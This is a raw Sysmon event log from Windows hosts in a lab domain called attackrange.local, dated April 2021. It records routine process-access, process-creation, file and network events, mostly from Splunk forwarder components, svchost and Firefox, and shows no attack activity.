12:24:48.192{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441284Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:48.191{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441283Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:48.191{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441282Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:48.191{42DC5269-CE96-6086-0500-00000000BA01}412428C:\Windows\system32\csrss.exe{42DC5269-0290-6088-CE28-00000000BA01}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000441281Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:48.191{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-0290-6088-CE28-00000000BA01}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000441280Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:48.191{42DC5269-0290-6088-CE28-00000000BA01}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000441322Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:49.973{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-0291-6088-D128-00000000BA01}6064C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441321Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:49.971{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441320Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:49.971{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441319Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:49.971{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441318Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:49.971{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441317Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:49.971{42DC5269-CE96-6086-0500-00000000BA01}412528C:\Windows\system32\csrss.exe{42DC5269-0291-6088-D128-00000000BA01}6064C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000441316Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:49.971{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-0291-6088-D128-00000000BA01}6064C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000441315Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:49.970{42DC5269-0291-6088-D128-00000000BA01}6064C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000441314Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:49.930{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F9145D12453D3CCB558A715FF1799A7,SHA256=1C894BD7A14980509F00F62FB3541D0370F0B168C992DD95B7A09CBE6CC9065D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292681Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:49.956{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=072DB05D238875E3B17D262F00877B8E,SHA256=2EBBF99E673AA6CD410DD760BD6A9515E2F96507898133E50B173D518CBBD856,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292680Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:49.473{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zh9k90mg.default-release\datareporting\glean\db\data.safe.binMD5=9167B6530BE680B5EC146BA1A27F97EF,SHA256=87EF7A87906B5397DBADA83FC5F5E1750B9E11ABDD04150FBA92C3656D2FA28A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292679Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:49.473{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zh9k90mg.default-release\datareporting\glean\db\data.safe.binMD5=F08B3C0E7BB9502526A524FFE9FE6B5A,SHA256=F34A48EB3DEED4F578B59BF57DF2C373F7B51007EDDF87CB245320E9C4E42691,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292678Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:49.473{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zh9k90mg.default-release\datareporting\glean\db\data.safe.binMD5=C94F730393406EC963B9E0D0A539254C,SHA256=CA5FDC7D4AE01CD45B1D16F1D75DDF5572E5E7090D1C1875738710BA141B3102,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292677Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:49.473{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zh9k90mg.default-release\datareporting\glean\db\data.safe.binMD5=1B7BF789E4D385F50BF98030D3EDE045,SHA256=6415D16020A92C4CCF367959DA2991F91ED90820E49DCA2FE84B1A4D3343DF64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292676Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:49.473{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zh9k90mg.default-release\datareporting\glean\db\data.safe.binMD5=723E1D56C144229BEECD05E2CCD7441B,SHA256=873EFB89AA389860CB7F68F191C1840651D5D89AF92E90A48C4692E038993D50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292675Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:49.473{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zh9k90mg.default-release\datareporting\glean\db\data.safe.binMD5=83C744F7C8CDD5E96C6BC9B2E7AF9948,SHA256=E1DB8C98BF76BDDFFA9D8741110A85295199CFEFAF1E5F2E3390FB4852239CDA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000292674Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:46.914{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50638-false69.192.193.125a69-192-193-125.deploy.static.akamaitechnologies.com80http 354300x8000000000000000292673Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:46.757{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50637-false69.192.193.125a69-192-193-125.deploy.static.akamaitechnologies.com80http 354300x8000000000000000292672Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:46.557{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50636-false52.247.37.26-80http 354300x8000000000000000292671Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:46.443{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50635-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x8000000000000000292670Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:46.442{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50634-false69.192.193.125a69-192-193-125.deploy.static.akamaitechnologies.com80http 23542300x8000000000000000292669Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:49.073{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFDE9A4E3C3566B7C53318378512C7BF,SHA256=45A1854FC7CBB05ACCADA81330DEAB262A3CBE1FE63EBB4CF79B13CE1AEC8623,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441313Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:49.455{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-0291-6088-D028-00000000BA01}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441312Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:49.453{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441311Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:49.453{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441310Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:49.453{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441309Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:49.453{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441308Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:49.452{42DC5269-CE96-6086-0500-00000000BA01}412428C:\Windows\system32\csrss.exe{42DC5269-0291-6088-D028-00000000BA01}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000441307Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:49.452{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-0291-6088-D028-00000000BA01}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000441306Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:49.452{42DC5269-0291-6088-D028-00000000BA01}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control 